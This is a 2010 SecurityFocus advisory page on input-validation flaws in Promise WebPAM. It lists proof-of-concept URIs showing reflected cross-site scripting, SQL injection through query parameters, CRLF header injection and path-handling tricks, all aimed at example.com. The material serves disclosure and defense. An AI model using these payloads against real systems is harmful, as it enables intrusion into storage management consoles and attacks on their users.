Promise WebPAM Multiple Input Validation Vulnerabilities

An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:


https://www.example.com/promise/ent_i.jsp?startTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?endTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?entSortOrder=desc%27
https://www.example.com/promise/ent_i.jsp?entSort=time%27
https://www.example.com/promise/tools/sqlrun.jsp?sqlstr=[QUERY SQLi]
https://www.example.com/promise/usr_ent.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/index.jsp%00
https://www.example.com/promise/index.jsp%20
https://www.example.com/promise/index.jsp%5C
https://www.example.com/promise/index.jsp#
https://www.example.com/promise/index.jsp\


 

Privacy Statement
Copyright 2010, SecurityFocus